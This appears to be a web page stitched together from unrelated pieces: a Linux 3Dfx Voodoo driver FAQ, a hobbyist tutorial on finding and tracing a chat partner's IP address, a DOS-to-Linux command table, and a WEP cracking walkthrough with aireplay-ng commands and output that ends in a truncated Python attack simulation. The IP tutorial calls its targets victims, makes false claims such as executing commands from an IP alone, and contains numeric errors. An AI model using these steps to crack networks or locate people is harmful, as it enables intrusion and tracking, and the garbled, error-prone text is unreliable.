I have reports regarding the Orchid Righteous 3D,<br /> Guillemot Maxi 3D Gamer, and Diamond Monster 3D.<br /><br /> If you are a board manufacturer who wants to make sure his Voodoo<br /> Graphics (tm), Voodoo Rush (tm) or Voodoo 2 (tm) boards work with<br /> upcoming releases of Linux, XFree86, Linux Glide and/or Mesa, please<br /> contact me, and I will happily forward your request to the persons<br /> maintaining the drivers in question. If you are interested in support<br /> for Linux Glide on other than the PC platform, e.g. DEC Alpha, please<br /> contact the maintainer of Linux Glide, Daryll Strauss, at<br /> daryll@harlot.rb.ca.us<br /><br /><br /><br /> 11.2. Failed to change I/O privilege?<br /><br /> You need to be root, or setuid your application, to run a Glide based<br /> application. For DMA, the driver accesses /dev/mem, which is not<br /> writable for anybody but root, with good reason. See the README in<br /> the Glide distribution for Linux.<br /><br /><br /><br /> 11.3. Does it work without root privilege?<br /><br /> There are compelling cases where the setuid requirement is a problem,<br /> obviously. There are currently solutions in preparation, which require<br /> changes to the library internals themselves.<br /><br /><br /><br /> 11.4. Displayed image looks awful (single screen)?<br /><br /> If you are using the analog pass through configuration, the common<br /> SVGA or X11 display might look pretty bad. You could try to get a<br /> better connector cable than the one provided with the accelerator<br /> board (the ones delivered with the Diamond Monster 3D are reportedly<br /> worse than the one accompanying the Orchid Righteous 3D), but up to a<br /> degree there will inevitably be signal loss with an additional<br /> transmission added.<br /><br /> If the 640x480 full screen image created by the accelerator board does<br /> look awful, this might indicate a real hardware problem. 
You will have<br /> to contact the board manufacturer, not 3Dfx, for details, as the<br /> quality of the video signal has nothing to do with the accelerator;<br /> the board manufacturer chooses the RAMDAC, output drivers, and other<br /> components responsible.<br /><br /><br /><br /> 11.5. The last frame is still there (single or dual screen)?<br /><br /> You terminated your application with Ctrl-C, or it did not exit<br /> normally. The accelerator board will dutifully provide the current<br /> content of the framebuffer as a video signal unless told otherwise.<br /><br /><br /><br /> 11.6. Powersave kicks in (dual screen)?<br /><br /> When your application terminates in dual screen setups, the accelerator<br /> board does not provide video output any longer. Thus powersave kicks in<br /> each time. To avoid this, use<br /><br /> ______________________________________________________________________<br /> setenv SST_DUALSCREEN 1<br /> ______________________________________________________________________<br /><br /><br /><br /> 11.7. My machine seems to lock (X11, single screen)?<br /><br /> If you are running X when calling a Glide application, you probably<br /> moved the mouse out of the window, and the keyboard inputs do not<br /> reach the application anymore.<br /><br /> If your application is supposed to run concurrently with X11, it is<br /> recommended to expose a full screen window, or use the XGrabPointer and<br /> XGrabServer functions to redirect all inputs to the application while<br /> the X server cannot access the display. Note that grabbing all input<br /> with XGrabPointer and XGrabServer does not qualify as a well-behaved<br /> application, and that your program might block the entire system.<br /><br /> If you experience this problem without running X, be sure that there<br /> is no hardware conflict (see below).<br /><br /><br /> 11.8. 
My machine locks (single or dual screen)?<br /><br /> If the system definitely does not respond to any inputs (you are<br /> running two displays and know about the loss of focus), you might<br /> experience a more or less subtle hardware conflict. See the installation<br /> troubleshooting section for details.<br /><br /> If there is no obvious address conflict, there might still be other<br /> problems (below). If you are writing your own code, the most common<br /> reason for locking is that you didn't snap your vertices. See the<br /> section on snapping in the Glide documentation.<br /><br /><br /> 11.9. My machine locks (used with S3 VGA board)?<br /><br /> It is possible you have a problem with memory region overlap specific<br /> to S3. There is some info and a patch to the so-called S3 problem on<br /> the 3Dfx web site, but these apply to Windows only. To my<br /> understanding, the cause of the problem is that some S3 boards (older<br /> revisions of the Diamond Stealth S3 968) reserve more memory space than<br /> actually used, thus the Voodoo Graphics (tm) has to be mapped to a<br /> different location. However, this has not been reported as a problem<br /> with Linux, and might be Windows-specific.<br /><br /><br /> 11.10. No address conflict, but locks anyway?<br /><br /> If you happen to use a motherboard with non-standard or incomplete PCI<br /> support, you could try to shuffle the boards a bit. I am running an<br /> ASUS TP4XE that has that non-standard modified "Media Slot", i.e. PCI<br /> slot 4 with an additional connector for ASUS-manufactured SCSI/Sound combo<br /> boards, and I experienced severe problems while running a Diamond<br /> Monster 3D in that slot. The system has operated flawlessly since I put<br /> the board in one of the regular slots.<br /><br /><br /><br /> 11.11. 
Mesa runs, but does not access the board?<br /><br /> Be sure that you recompiled all the libraries (including the toolkits<br /> the demo programs use; remember that GLUT does not yet support Voodoo<br /> Graphics (tm)), and that you removed the older libraries, ran<br /> ldconfig, and/or set your LD_LIBRARY_PATH properly. Mesa supports<br /> several drivers in parallel (you could use X11 SHM, off screen<br /> rendering, and Mesa Voodoo at the same time), and you might have to<br /> create and switch contexts explicitly (see the MakeCurrent function) if<br /> the Voodoo Graphics (tm) isn't chosen by default.<br /><br /><br /><br /> 11.12. Resetting dual board SLI?<br /><br /> If a Quantum 3D Obsidian board used in an SLI setup exits abruptly<br /> (i.e., the application crashes, or is aborted by the user), the boards are<br /> left in an undefined state. With the dual-board set, you can run a<br /> program called resetsli to reset them. Until you run the resetsli<br /> program, you will not be able to re-initialize the Obsidian board.<br /><br /><br /><br /> 11.13. Resetting single board SLI?<br /><br /> The resetsli program mentioned above does not yet work with a single<br /> board Obsidian SLI (e.g. the Obsidian 100-4440SB). 
You will have to<br /> reboot your system by reset in order to reset the board.<br /><br /><br /><br />IP address hacking (posted 2009-06-23)<br /><br />In here I have figured out some very easy but cool ways to trace out the geographical location and various other info like ISP details etc. of a remote computer using its IP.<br /><br />Well I guess it's one of the most important must-learn manuals for boys out there if you want to impress your friends, particularly gals whom you'll meet online in a chat room, and tell them their geographical locations and ISP details and make them surprised and impressed.<br /><br />In the practical execution of this manual you don't have to work much as it is very simple; you only have to use your brain to understand some symbols and some format of expressions and use your IQ to execute things the right way.<br /><br /><br /><br />What is IP and how to get the IP of a remote system::<br /><br /><br /><br />Getting the IP or Internet Protocol address of a remote system is the most important and the first step of hacking into it. Probably it is the first thing a hacker does to get info for researching a system. Well an IP is a unique number assigned to each computer on a network. It is this unique address which represents the system on the network. Generally the IP of a particular system changes each time you log on to the network by dialing to your ISP and it is assigned to you by your ISP. The IP of a system which is always on the network generally remains the same. Generally those kinds of systems are most likely to suffer a hacking attack because of their stable IP. Using the IP you can even execute system commands on the victim's computer.<br /><br />Let's take the example of the following IP address: 202.144.49.110 Now the first part, the numbers before the first decimal i.e. 
209 is the Network number or the Network Prefix. This means that it identifies the number of the network in which the host is. The second part i.e. 144 is the Host Number, that is, it identifies the number of the host within the Network. This means that in the same Network, the network number is the same. In order to provide flexibility in the size of the Network, there are different classes of IP addresses:<br /><br /><br /><br />Address Class Dotted Decimal Notation Ranges<br /><br />Class A ( /8 Prefixes) 1.xxx.xxx.xxx through 126.xxx.xxx.xxx<br /><br />Class B ( /16 Prefixes) 128.0.xxx.xxx through 191.255.xxx.xxx<br /><br />Class C ( /24 Prefixes) 192.0.0.xxx through 223.255.255.xxx<br /><br /><br /><br />The various classes will be clearer after reading the next few lines.<br /><br /><br /><br />Each Class A Network Address contains an 8-bit Network Prefix followed by a 24-bit host number. They are considered to be primitive. They are referred to as "/8's" or just "8's" as they have an 8-bit Network prefix.<br /><br />In a Class B Network Address there is a 16-bit Network Prefix followed by a 16-bit Host number. It is referred to as "16's".<br /><br /><br /><br />A Class C Network address contains a 24-bit Network Prefix and an 8-bit Host number. It is referred to as<br /><br />"24's" and is commonly used by most ISPs.<br /><br /><br /><br />Due to the growing size of the Internet the Network Administrators faced many problems. The Internet routing tables were beginning to grow and now the administrators had to request another network number from the Internet before a new network could be installed at their site. This is where sub-netting came in.<br /><br /><br /><br />Now if your ISP is a big one and if it provides you with dynamic IP addresses then you will most probably see that whenever you log on to the net, your IP address will have the same first 24 bits and only the last 8 bits will keep changing. 
This is due to the fact that when sub-netting comes in then the IP Address structure becomes:<br /><br /><br /><br />xxx.xxx.zzz.yyy<br /><br /><br /><br />where the first 2 parts are Network Prefix numbers, the zzz is the Subnet number and the yyy is the host number. So you are always connected to the same Subnet within the same Network. As a result the first 3 parts will remain the same and only the last part i.e. yyy is variable.<br /><br />***********************<br /><br /><br /><br />For example, if say an ISP xyz is given the IP: 203.98.12.xx Network address then you can be awarded any IP whose first three fields are 203.98.12. Get it?<br /><br /><br /><br />So, basically this means that each ISP has a particular range in which to allocate all its subscribers. Or in other words, all subscribers or all people connected to the internet using the same ISP will have to be in this range. This in effect would mean that all people using the same ISP are likely to have the same first three fields of their IP Addresses.<br /><br /><br /><br />This means that if you have done a lot of (by this I really mean a lot of) research, then you could figure out which ISP a person is using by simply looking at his IP. The ISP name could then be used to figure out the city and the country of the person. Right? Let me take an example to stress how cumbersome but easy (once the research is done) the above method can be.<br /><br /><br /><br />In my country, say there are three main ISPs:<br /><br /><br /><br />ISP Name Network Address Allotted<br /><br /><br /><br />ISP I 203.94.47.xx<br /><br />ISP II 202.92.12.xx<br /><br />ISP III 203.91.35.xx<br /><br /><br /><br />Now, if I get to know the IP of an e-pal of mine, and it reads: 203.91.35.12, then I can pretty easily figure out that he uses ISP III to connect to the internet. Right? You might say that any idiot would be able to do this. Well, yes and no. 
You see, the above method of finding out the ISP of a person was successful only because we already had the ISP and Network Address Allotted list with us. So, my point is that the above method can be successful only after a lot of research and experimentation. And I do think such research can be helpful sometimes.<br /><br /><br /><br />Also, this would not work if you take it on at a larger scale. What if the IP that you have belongs to someone living in a remote igloo at the North Pole? You could not possibly get the Network Addresses of all the ISPs in the world, could you? If yes please send it to me :)<br /><br /><br /><br />Well now I guess you have pretty good knowledge about what an IP is and what you can do by knowing the IP of a remote system. Now let's come to the point of finding out the IP of a remote system.<br /><br />Well you can easily figure out the IP of a remote system using the netstat utility available in Microsoft's version of DOS. The netstat command shows the connections in which your system is engaged and the ports they are using. Suppose you are checking your mail in hotmail and you want to find out the IP of msn. All you need to do is to open a DOS window (command.com) and type netstat. You will see all the open connections of your system. 
There you will see something like:<br /><br /><br /><br />Proto Local Address Foreign Address State<br /><br />TCP abhisek:1031 64.4.xx.xx:80 ESTABLISHED<br /><br /><br /><br />Now you have got the IP address of hotmail as 64.4.xx.xx .<br /><br />Similarly you can figure out the IP address of most http or ftp connections.<br /><br /><br /><br />To know your own IP type the following command in a DOS window<br /><br />C:\&gt;netstat -n<br /><br />[the -n switch makes netstat show numeric IP addresses instead of resolving them to names]<br /><br />this is what you will probably see on typing the above command :<br /><br /><br /><br />Proto Local Address Foreign Address State<br /><br />TCP 203.xx.251.161:1031 194.1.129.227:21 ESTABLISHED<br /><br />TCP 203.xx.251.161:1043 207.138.41.181:80 FIN_WAIT_2<br /><br />TCP 203.xx.251.161:1053 203.94.243.71:110 TIME_WAIT<br /><br />TCP 203.xx.251.161:1058 194.1.129.227:20 TIME_WAIT<br /><br />TCP 203.xx.251.161:1069 203.94.243.71:110 TIME_WAIT<br /><br />TCP 203.xx.251.161:1071 194.98.93.244:80 ESTABLISHED<br /><br />TCP 203.xx.251.161:1078 203.94.243.71:110 TIME_WAIT<br /><br /><br /><br />Here 203.xx.251.161 is your IP address.<br /><br /><br /><br />Now let's clarify the format used by netstat :<br /><br /><br /><br />Proto : It shows the type of protocol the connection with the remote system is using.<br /><br />Here TCP (transmission control protocol) is the protocol used by my system to connect to other systems.<br /><br /><br /><br />Local Address : It shows the local address i.e. the local IP. When the netstat command is executed without the -n switch then the name of the local system is displayed, and when netstat is executed with the -n switch then the IP of the local system is displayed. Here you can also find out the port used by the connection.<br /><br />xxx.yyy.zzz.aaa:1024<br /><br />in this format you will see the local address. 
Here 1024 is the port on your system to which the remote system is connected.<br /><br /><br /><br />Foreign Address :: It shows the IP address of the remote system to which your system is connected. In this case also, if the netstat command is executed with the -n switch then you directly get the IP of the victim, but if netstat is executed without the -n switch then you will get the host name of the remote system. Something like<br /><br /><br /><br />C:\&gt;netstat<br /><br />Proto Local Address Foreign Address State<br /><br />TCP abhisek:1031 msgr.lw4.gs681.hotmail.com:80 ESTABLISHED<br /><br /><br /><br />Here msgr.lw4.gs681.hotmail.com is the address of the foreign system. Putting this address in any IP lookup program and doing a whois lookup will reveal the IP of the remote system.<br /><br /><br /><br />Note: The port to which your system is connected can be found from this in the same way as I have shown in the case of the local address. The difference is that this is the port of the remote system to which your computer is connected.<br /><br />Below I have produced a list of ports and popular services generally found to be running.<br /><br />21 :: FTP port<br /><br />80 :: http port<br /><br />23 :: Telnet port<br /><br /><br /><br />Note: If you execute the netstat command and find ports like 12345, 27374 are open and in use then make sure that your sweetheart computer is infected with her boyfriend.. :) :) :) :) I mean your computer is infected with some sort of Trojan.<br /><br />Below I have produced a list of commonly known Trojans and the ports they use by default. So if you find these ports open then get a good virus buster and get these stupid servers of the Trojans kicked out. 
Well if you want to play with these Trojans by keeping them on your computer but not letting them ruin your system performance then just disable them from the system registry Run key and they won't be loaded into memory each time Windows starts up [this trick doesn't work for all Trojans].<br /><br /><br /><br />Netbus :: 12345 (TCP)<br /><br />Subseven :: 27374 (TCP)<br /><br />Girl Friend :: 21554 (TCP)<br /><br />Back Orifice :: 31337 (UDP)<br /><br /><br /><br />Well guys and gals I hope you are now well familiar with the term IP and what the utility of the IP is in the cyber world and how to get the IP of a remote system to which you are connected. I hope you find my writings very easy to understand. I know I lack the capacity of explaining myself but I try my level best to make things very easy and clear for you all.<br /><br /><br /><br />How to get the IP of a remote system while chatting through msn messenger ::<br /><br /><br /><br />This is a tutorial on how to get an IP address from MSN messenger. This is actually<br />a really easy thing to do. It is not like going through the hard time of reversing<br />MSN messenger like many people think.<br /><br />The IP address is only given when you accept or are sending a file through MSN<br />messenger. When you send IMs, the message is sent through the server, thus hiding<br />your victim's IP and yours. But when you send a file or receive a file, it is a direct<br />connection between the two computers.<br /><br />To obtain the IP accept a file transfer or send a file to the victim; when the file<br />sending is under way, from the DOS prompt type "netstat" without the quotation marks.<br />You should get a table like this:<br /><br />Proto Local Address Foreign Address State<br />TCP kick:1033 msgr-ns29.msgr.hotmail.com:1863 ESTABLISHED<br />TCP kick:1040 msgr-sb36.msgr.hotmail.com:1863 ESTABLISHED<br />TCP kick: &lt;remote&gt; ESTABLISHED<br /><br />The top name in the list is the server's address for IMing. 
There could be many of<br />the second name in the list, as a new connection is made to the server for every<br />room you are IMing to. You are looking for the address of the remote host in<br />this table; it may be something similar to "host63-7-102-226.ppp.cal.vsnl.com" or "203.64.90.6",<br />without the quotation marks.<br />All you need to do now is to put this address in your IP lookup program and get the IP of the remote system.<br /><br /><br />Well 50% of the work is done now. Now you know how to get the IP of a remote system, so it's time to trace it down and find some details about the IP.<br /><br /><br /><br />Tracing an IP is quite simple. You can do it the easy way by using some sweet software like Visual Trace 6.0b<br /><br />[ftp://ftp.visualware.com/pub/vr/vr.exe]<br /><br />Neotrace<br /><br />[http://www.neoworx.com/download/NTX325.exe]<br /><br />or by our way, i.e. using MS DOS or any other version of DOS.<br /><br />Well I suggest you use DOS and its tracert tool for tracing the IP, because using it will give you a clear conception of the art of tracing an IP and I guarantee that you will feel much more satisfied on success than using some silly software. 
Further you will know how things work and how the IP is traced down and the different networks associated in this tracing process.<br /><br /><br /><br />Let us take a look at the tracert tool provided for DOS by Microsoft.<br /><br />It is a very handy tool for people who need to trace down an IP.<br /><br />Just open any DOS window and type tracert.<br /><br /><br /><br />C:\windows&gt;tracert<br /><br /><br /><br />Usage: tracert [-d] [-h maximum_hops] [-j host-list] [-w timeout] target_name<br /><br /><br />Options:<br /><br />-d Do not resolve addresses to hostnames.<br /><br />-h maximum_hops Maximum number of hops to search for target.<br /><br />-j host-list Loose source route along host-list.<br /><br />-w timeout Wait timeout milliseconds for each reply.<br /><br /><br />You will now see a description of the tracert command and the switches associated with it.<br /><br />Well these switches don't make much difference. All you can do is increase the timeout in milliseconds by using the -w switch if you are using a slow connection, and use the -d switch if you do not want addresses resolved to hostnames.<br /><br />By default tracert performs a trace of at most 30 hops. Using the -h switch you can specify the number of hops to perform.<br /><br />Now it's time for execution.<br /><br />Let us trace down the IP yahoo.com [216.115.108.243]<br /><br /><br /><br />TIP: If you have done a long research (I mean a lot) then simply looking at the IP you can figure out some info from it. For example the IP 203.90.68.8 indicates that the system is in India. 
In India IPs generally begin with 203 and 202.<br /><br /><br /><br />C:\WINDOWS&gt;tracert yahoo.com<br /><br /><br /><br />Tracing route to yahoo.com [216.115.108.243] over a maximum of 30 hops:<br /><br /><br /><br />1 308 ms 142 ms 127 ms 203.94.246.35<br /><br />2 140 ms 135 ms * 203.94.246.1<br /><br />3 213 ms 134 ms 132 ms 203.94.255.33<br /><br />4 134 ms 130 ms 129 ms 203.200.64.29<br /><br />5 122 ms 135 ms 131 ms 203.200.87.75<br /><br />6 141 ms 137 ms 121 ms 203.200.87.15<br /><br />7 143 ms 170 ms 154 ms vsb-delhi-stm1.Bbone.vsnl.net.in [202.54.2.241]<br /><br />8 565 ms 589 ms 568 ms if-7-0.bb8.NewYork.Teleglobe.net [207.45.198.65]<br /><br />9 596 ms 584 ms 600 ms if-3-0.core2.NewYork.teleglobe.net [207.45.221.66]<br /><br />10 * * * Request timed out.<br /><br />11 703 ms 701 ms 719 ms if-3-0.core2.PaloAlto.Teleglobe.net [64.86.83.205]<br /><br />12 694 ms 683 ms 681 ms if-6-1.core1.PaloAlto.Teleglobe.net [207.45.202.33]<br /><br />13 656 ms 677 ms 700 ms ix-5-0.core1.PaloAlto.Teleglobe.net [207.45.196.90]<br /><br />14 667 ms 673 ms 673 ms ge-1-3-0.msr1.pao.yahoo.com [216.115.100.150]<br /><br />15 653 ms 673 ms 673 ms vl20.bas1.snv.yahoo.com [216.115.100.225]<br /><br />16 666 ms 676 ms 674 ms yahoo.com [216.115.108.243]<br /><br />Trace complete.<br /><br /><br /><br />Note: Here I have traced yahoo.com. In place of yahoo.com you can give the IP of yahoo or any other IP you want to trace; the result will be the same.<br /><br /><br /><br />Now, carefully looking at the results, you can figure out a lot of information about yahoo's server [216.115.108.243]<br /><br />First, packets of data leave my ISP which is at 203.94.246.35. Similarly you can find out the different routers through which the packets of data are sent and received to and from the target system. Now take a look at the 13th line: you'll see that the router is in PaloAlto.Teleglobe.net, from which you can easily figure out that the router is in Palo Alto. 
Now finally look at the target system i.e. Yahoo's server vl20.bas1.snv.yahoo.com . Now you have got the address of yahoo's server. Now put this address in any IP lookup program and perform a reverse DNS lookup and you will get most of the info about this address, like the place where it is.<br /><br />Well another thing you can find out using the tracert tool is the number of hops (routers) the target system is away from you. In the case of tracerouting yahoo.com we find that the target system i.e. yahoo's server is 16 hops away from my system. This indicates that there are 16 routers between my system and yahoo's server.<br /><br /><br /><br />Apart from tracing an IP you can find out many useful details about the target system using the tracert tool.<br /><br /><br /><br />Firewall Detection<br /><br /><br /><br />While tracerouting a target system, if you get * as an output then it indicates a timeout error. Now if you perform another tracert to the same target system at some other time with a good connection, and a few more times in this way, and you always get * as the output, then take it for sure that the target system is running a firewall which prevents sending of data packets from the target system.<br /><br /><br /><br />Example<br /><br /><br /><br />Some days ago I tried to tracert hotmail's server in a plain and simple way using tracert without any trick. This is what I found out :<br /><br /><br /><br /><br />c:\windows&gt;tracert 64.4.53.7<br /><br /><br /><br />Tracing route to lc2.law5.hotmail.com [64.4.53.7]<br /><br /><br />over a maximum of 30 hops:<br /><br /><br /><br /><br /><br /><br />1 * * * Request timed out.<br /><br />2 161 ms 147 ms 85 ms 203.90.69.81<br /><br />3 126 ms 261 ms 219 ms 203.90.66.9<br /><br />4 121 ms 115 ms 228 ms delswp2.hclinfinet.com [203.90.66.133]<br /><br />5 727 ms 725 ms 711 ms 203-195-147-250.now-india.net.in [203.195.147.250]<br /><br />6 1006 ms 794 ms 952 ms core-fae-0-0.now-india.net.in [203.195.147.3]<br /><br />7 826 ms 731 ms 819 ms 213.232.106.9<br /><br />8 885 ms 744 ms 930 ms 213.166.3.209<br /><br />9 851 ms 1020 ms 1080 ms 213.232.64.54<br /><br />10 1448 ms 765 ms 1114 ms pos8-0.core2.London1.Level3.net [212.113.0.118]<br /><br />11 748 ms 789 ms 750 ms ge-4-2-1.mp2.London1.Level3.net [212.187.131.146]<br /><br />12 719 ms 733 ms 846 ms so-3-0-0.mp1.London2.Level3.net [212.187.128.46]<br /><br />13 775 ms 890 ms 829 ms so-1-0-0.mp2.Weehawken1.Level3.net [212.187.128.138]<br /><br />14 853 ms 852 ms 823 ms so-3-0-0.mp1.SanJose1.Level3.net [64.159.1.129]<br /><br />15 889 ms 816 ms 803 ms so-7-0-0.gar1.SanJose1.Level3.net [64.159.1.74]<br /><br />16 * * * Request timed out.<br /><br />17 * * * Request timed out.<br /><br />18 * * * Request timed out.<br /><br />19 * * * Request timed out.<br /><br />20 * * * Request timed out.<br /><br />21 * * * Request timed out.<br /><br />22 * * * Request timed out.<br /><br />23 * * * Request timed out.<br /><br />24 * * * Request timed out.<br /><br />25 * * * Request timed out.<br /><br />26 * * * Request timed out.<br /><br />27 * * * Request timed out.<br /><br />28 * * * Request timed out.<br /><br />29 * * * Request timed out.<br /><br />30 * * * Request timed out.<br /><br />Trace complete.<br /><br /><br />I performed the same tracert many times a day but concluded with the same result. This indicates that the systems after the router SanJose1.Level3.net have firewalls installed which prevent the outgoing of data packets.<br /><br /><br /><br />Detecting Traceroute Attempts on your System<br /><br /><br /><br />You can detect that an attacker is performing a traceroute on your system if you see the following symptoms:<br /><br /><br /><br />1. If you observe port scans on very high UDP ports. This symptom means that the attacker has performed a traceroute on your system. However, it could also mean a simple port scan. Either way, it signifies the fact that your system is being scanned.<br /><br /><br /><br />2. 
If the packet-monitoring tool on your network picks up several outgoing ICMP Time Exceeded (type 11) messages from your routers or hosts, that is another sign that someone is tracerouting you: each probe is sent with a small TTL that expires at successive hops, and every hop reports it.<br /><br />3. If those logs also show an outgoing ICMP Port Unreachable (type 3, code 3) message, the traceroute reached its destination, your system, which answered the UDP probe to an unused port with this error. That final message is what tells the tracing host that the trace is complete.<br /><br />Translating DOS to Linux (2009-06-23)<br /><br />DOS Command: dir, dir /w<br />Linux Equivalent: ls -l, ls<br /><br />DOS Command: chdir or cd with no argument (show current directory)<br />Linux Equivalent: pwd<br /><br />DOS Command: del (remove a file)<br />Linux Equivalent: rm<br /><br />DOS Command: deltree (remove a directory and all files under it)<br />Linux Equivalent: rm -r<br /><br />DOS Command: copy<br />Linux Equivalent: cp<br /><br />DOS Command: xcopy (copy all files in a directory and under it)<br />Linux Equivalent: cp -R<br /><br />DOS Command: rename, move<br />Linux Equivalent: mv<br /><br />DOS Command: type (print contents of a file to the screen)<br />Linux Equivalent: cat<br /><br />DOS Command: help, <command> /?<br />Linux Equivalent: man<br /><br />DOS Command: cls (clear screen)<br />Linux Equivalent: clear<br /><br />DOS Command: find (search for a word or words in a specified file)<br />Linux Equivalent: grep<br /><br />DOS Command: fc (compare two files and find differences between them)<br />Linux Equivalent: diff<br /><br />DOS Command: set (show environment variables)<br />Linux Equivalent: env<br /><br />DOS Command: set variable=value (set an environment variable)<br />Linux Equivalent: export variable=value<br /><br />DOS Command: edit filename<br />Linux Equivalent: vi filename, pico filename, nano -w filename (varies based on editor of choice)<br /><br />DOS Command: attrib +h filename (makes a file hidden)<br />Linux Equivalent: mv file .file (a leading dot hides it from a plain ls)<br /><br />DOS Command: mem (displays available memory)<br />Linux Equivalent: free, top<br /><br />DOS Command: scandisk<br />Linux Equivalent: fsck<br /><br />DOS Command: defrag c:\<br />Linux Equivalent: e4defrag on ext4; ext2/ext3 have no maintained defragmenter and rarely need one<br /><br />DOS Command: format<br />Linux Equivalent: mke2fs, mke2fs -j (ext3), mkreiserfs, mkswap, etc. (varies based on desired filesystem)<br /><br />DOS Command: pkzip (creates an archive of files)<br />Linux Equivalent: tar, usually combined with gzip for compression (zip and unzip also exist)<br /><br />DOS Command: tracert<br />Linux Equivalent: traceroute<br /><br />DOS Command: ipconfig (check IP address and network settings)<br />Linux Equivalent: ifconfig (or ip addr)<br /><br />DOS Command: nbtstat -a hostname (query a host's NetBIOS name table; for DNS lookups use nslookup on either system)<br />Linux Equivalent: nmblookup -A ipaddress (from Samba)<br /><br />DOS Command: route print (display routing table)<br />Linux Equivalent: route -n (or ip route)<br /><br />DOS Command: net send host message (send a message to another computer)<br />Linux Equivalent: smbclient -M host (Windows hosts), talk (Linux hosts)<br /><br />WiFi Hacking (2009-06-23)<br /><br />Clientless WEP Cracking<br /><br />Before Starting, Ensure:<br /><br />Your hardware and driver support packet injection. The aireplay-ng injection test (-9, added in releases after 0.8) tells you; Wireshark only shows what you receive, not whether your frames actually go out.<br /><br />You are within range of an AP. Seeing packets from the AP does not mean the AP can hear you if the distance is too great: a card's transmit power is usually lower than an AP's.<br /><br />The AP is transmitting.<br /><br />The AP is using WEP with Open Authentication. If Shared Key Authentication (SKA) is in use, you must already have captured the PRGA (keystream) xor data.<br /><br />You are using v0.8 of aircrack-ng. 
Other versions may need different command variations.<br /><br />Equipment used:<br />MAC of the card doing the injecting: 00:11:22:33:44:55<br />BSSID (AP's MAC): 13:13:13:13:13:13<br />ESSID (wireless network name): TEST<br />Access point channel: 9<br />Wireless interface: rausb0<br /><br />Solution Overview<br /><br />Here are the basic steps we will be going through:<br />1 - Start the wireless interface in monitor mode on the AP's channel<br />2 - Fake-authenticate using aireplay-ng with the -1 option<br />3 - Run a fragmentation (or chopchop) attack to obtain a PRGA keystream<br />4 - Use packetforge-ng to build an ARP request from that keystream<br />5 - Use airodump-ng to capture IVs<br />6 - Inject the ARP request built in step 4<br />7 - Run aircrack-ng (PTW) to crack the WEP key<br /><br />Step 1 - Start the wireless interface in monitor mode on the AP channel<br /><br />Enter the following command to put the card into monitor mode on channel 9:<br />airmon-ng start rausb0 9<br /><br />Use <a href="http://www.rflinx.com/help/calculations/#2.4ghz_wifi_channels" target="_blank">http://www.rflinx.com/help/calculations/#2.4ghz_wifi_channels</a> if you need to convert a frequency to a channel number.<br /><br />Troubleshooting Tips:<br /><br />Monitor-mode interface names depend on the driver (madwifi creates athX, for example). If airmon-ng started an interface other than rausb0, use that name in the commands that follow, or stop it with "airmon-ng stop athX", where X identifies the interface.<br /><br />Step 2 - Use aireplay-ng to do a fake authentication with the access point<br /><br />An AP will not accept a data frame from a MAC that is not associated with it. If the source MAC you inject from is not associated, the AP ignores the frame and sends a DeAuthentication frame. 
No new IVs are generated in this situation, because the AP drops every frame carrying the unassociated MAC.<br /><br />Use aireplay-ng to fake-authenticate to the AP:<br />aireplay-ng -1 0 -e TEST -a 13:13:13:13:13:13 -h 00:11:22:33:44:55 rausb0<br /><br />Where:<br />-1 means fake authentication<br />0 is the reassociation timing in seconds (0 = authenticate once)<br />-e TEST is the wireless network name<br />-a 13:13:13:13:13:13 is the access point MAC address<br />-h 00:11:22:33:44:55 is our card's MAC address<br />rausb0 is the wireless interface name<br />Success looks like:<br />18:18:20 Sending Authentication Request<br />18:18:20 Authentication successful<br />18:18:20 Sending Association Request<br />18:18:20 Association successful :-)<br /><br />Or another variation for picky access points:<br />aireplay-ng -1 6000 -o 1 -q 10 -e TEST -a 13:13:13:13:13:13 -h 00:11:22:33:44:55 rausb0<br /><br />Where:<br />6000 - Reauthenticate every 6000 seconds. The long period also causes keep-alive packets to be sent.<br />-o 1 - Send only one set of packets at a time. 
The default is several, which confuses some APs.<br />-q 10 - Send keep-alive packets every 10 seconds.<br />Success:<br />18:22:32 Sending Authentication Request<br />18:22:32 Authentication successful<br />18:22:32 Sending Association Request<br />18:22:32 Association successful :-)<br />18:22:42 Sending keep-alive packet<br />18:22:52 Sending keep-alive packet<br /># and so on.<br />Failed authentication (the AP keeps deauthenticating us, so the association never sticks):<br />18:28:02 Sending Authentication Request<br />18:28:02 Authentication successful<br />18:28:02 Sending Association Request<br />18:28:02 Association successful :-)<br />18:28:02 Got a deauthentication packet!<br />18:28:05 Sending Authentication Request<br />18:28:05 Authentication successful<br />18:28:05 Sending Association Request<br />18:28:10 Sending Authentication Request<br />18:28:10 Authentication successful<br />18:28:10 Sending Association Request<br /><br />Do NOT proceed beyond this step if fake authentication is not working.<br /><br />Troubleshooting Tips:<br />Some APs implement MAC filtering. In that case you need the MAC of a client that is allowed on the target AP (airodump-ng lists associated stations); use macchanger to set your card to it, and use that MAC in every -h option from here on.<br /><br />Step 3 - Use the aireplay-ng chopchop or fragmentation attack to obtain a PRGA keystream<br /><br />The objective of the chopchop and fragmentation attacks is to obtain a file of PRGA (pseudo-random generation algorithm) output, that is, RC4 keystream bytes for one IV. This is not the WEP key, and it cannot decrypt other packets, because every IV has its own keystream. But WEP lets a sender reuse an IV, so anything XORed with that keystream and given a valid ICV is a frame the AP will accept; that is how new packets are forged. Use whichever of chopchop or fragmentation works against the AP; when one fails, try the other. 
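To make concrete why a keystream file is enough to forge frames without the key, here is an added example (my code, not from the original post and not aircrack-ng's) that simulates the fragmentation attack in Python. RC4 and the WEP frame format are implemented from the specification; the 40-bit key, the IV and the MAC address are made-up constants; and the access point is a function that decrypts valid fragments, reassembles them and re-encrypts the result under a fresh IV, which is the behaviour the real attack relies on. The attacker-side functions never read WEP_KEY.

```python
"""Simulated WEP fragmentation attack: grow a few known keystream bytes into a
full keystream and forge a frame the AP accepts, without ever using the key.
Added example with made-up values; nothing here touches real hardware."""
import os
import struct
import zlib

WEP_KEY = bytes.fromhex("0102030405")            # assumed 40-bit key; only the AP side reads it
LLC_SNAP_ARP = bytes.fromhex("aaaa030000000806")  # known first 8 plaintext bytes of any ARP frame


def rc4_keystream(key, length):
    """RC4 key scheduling plus PRGA; the PRGA output is what aircrack-ng saves in the .xor file."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out, i, j = bytearray(), 0, 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def icv(data):
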